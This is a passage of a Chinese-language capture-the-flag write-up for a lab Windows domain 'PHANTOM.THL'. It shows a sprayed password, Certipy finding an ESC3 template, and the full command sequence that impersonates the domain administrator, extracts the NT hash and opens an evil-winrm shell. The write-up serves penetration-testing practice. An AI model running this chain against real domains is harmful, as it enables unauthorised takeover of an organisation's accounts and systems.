SMB 192.168.56.100 445 DC01 [-] PHANTOM.THL\robert:f6Y%UPa6ZB9eR5wG9$an STATUS_LOGON_FAILURE
SMB 192.168.56.100 445 DC01 [+] PHANTOM.THL\tomas:f6Y%UPa6ZB9eR5wG9$an
ESC3
刚刚的留言里提到过证书,尝试寻找证书漏洞
[/home/kali/temp]$ certipy find -u tomas@phantom.thl -p 'f6Y%UPa6ZB9eR5wG9$an' -dc-ip 192.168.56.100 -vulnerable
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'PHANTOM-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'PHANTOM-DC01-CA'
[*] Checking web enrollment for CA 'PHANTOM-DC01-CA' @ 'DC01.PHANTOM.THL'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20260713215038_Certipy.txt'
[*] Wrote text output to '20260713215038_Certipy.txt'
[*] Saving JSON output to '20260713215038_Certipy.json'
[*] Wrote JSON output to '20260713215038_Certipy.json'
[/home/kali/temp]$ cat 20260713215038_Certipy.txt
Certificate Authorities
0
CA Name : PHANTOM-DC01-CA
DNS Name : DC01.PHANTOM.THL
Certificate Subject : CN=PHANTOM-DC01-CA, DC=PHANTOM, DC=THL
Certificate Serial Number : 161A58313EFA72A045F730EFC3CFED39
Certificate Validity Start : 2026-02-21 23:23:37+00:00
Certificate Validity End : 2031-02-21 23:33:37+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : PHANTOM.THL\Administrators
Access Rights
ManageCa : PHANTOM.THL\Administrators
PHANTOM.THL\Admins. del dominio
PHANTOM.THL\Administradores de empresas
ManageCertificates : PHANTOM.THL\Administrators
PHANTOM.THL\Admins. del dominio
PHANTOM.THL\Administradores de empresas
Enroll : PHANTOM.THL\Authenticated Users
Certificate Templates
0
Template Name : Phantom-DevAuth
Display Name : Phantom-DevAuth
Certificate Authorities : PHANTOM-DC01-CA
Enabled : True
Client Authentication : False
Enrollment Agent : True
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectAltRequireUpn
SubjectRequireDirectoryPath
Enrollment Flag : AutoEnrollment
Extended Key Usage : Certificate Request Agent
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 2 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2026-02-21T23:36:09+00:00
Template Last Modified : 2026-02-21T23:37:14+00:00
Permissions
Enrollment Permissions
Enrollment Rights : PHANTOM.THL\Tomas
PHANTOM.THL\Admins. del dominio
PHANTOM.THL\Administradores de empresas
Object Control Permissions
Owner : PHANTOM.THL\Administrador
Full Control Principals : PHANTOM.THL\Admins. del dominio
PHANTOM.THL\Administradores de empresas
Write Owner Principals : PHANTOM.THL\Admins. del dominio
PHANTOM.THL\Administradores de empresas
Write Dacl Principals : PHANTOM.THL\Admins. del dominio
PHANTOM.THL\Administradores de empresas
Write Property Enroll : PHANTOM.THL\Admins. del dominio
PHANTOM.THL\Administradores de empresas
[+] User Enrollable Principals : PHANTOM.THL\Tomas
[!] Vulnerabilities
ESC3 : Template has Certificate Request Agent EKU set.
发现 ESC3 ,跟着流程走就行了:06 ‐ Privilege Escalation · ly4k/Certipy Wiki
Step 1: 使用 Tomas 获取 Enrollment Agent 证书
[/home/kali/temp]$ certipy req \
-u 'tomas@phantom.thl' -p 'f6Y%UPa6ZB9eR5wG9$an' \
-dc-ip '192.168.56.100' -target 'DC01.PHANTOM.THL' \
-ca 'PHANTOM-DC01-CA' -template 'Phantom-DevAuth' \
-out 'tomas_agent'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 12
[*] Successfully requested certificate
[*] Got certificate with UPN 'tomas@PHANTOM.THL'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'tomas_agent.pfx'
[*] Wrote certificate and private key to 'tomas_agent.pfx'
Step 2: 使用代理证书请求管理员证书,(注意这里是西班牙语 administrador )
[/home/kali/temp]$ certipy req \
-u 'tomas@phantom.thl' -p 'f6Y%UPa6ZB9eR5wG9$an' \
-dc-ip '192.168.56.100' -target 'DC01.PHANTOM.THL' \
-ca 'PHANTOM-DC01-CA' -template 'User' \
-pfx 'tomas_agent.pfx' -on-behalf-of 'PHANTOM\Administrador' \
-out 'administrador'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 23
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrador@PHANTOM.THL'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrador.pfx'
[*] Wrote certificate and private key to 'administrador.pfx'
Step 3: 获取管理员 TGT 和 NTLM Hash
[/home/kali/temp]$ certipy auth -pfx 'administrador.pfx' -dc-ip '192.168.56.100'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'Administrador@PHANTOM.THL'
[*] Using principal: 'administrador@phantom.thl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrador.ccache'
[*] Wrote credential cache to 'administrador.ccache'
[*] Trying to retrieve NT hash for 'administrador'
[*] Got hash for 'administrador@phantom.thl': aad3b435b51404eeaad3b435b51404ee:dda94fc1fe<hidden>
然后远程登录拿到 root.txt
[/home/kali/temp]$ evil-winrm -i 192.168.56.100 -u administrador -H 'dda94fc1fe<HIDDEN>'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrador\Documents> dir
*Evil-WinRM* PS C:\Users\Administrador\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\Administrador\desktop> dir
Directorio: C:\Users\Administrador\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/22/2026 3:01 AM 33 root.txt



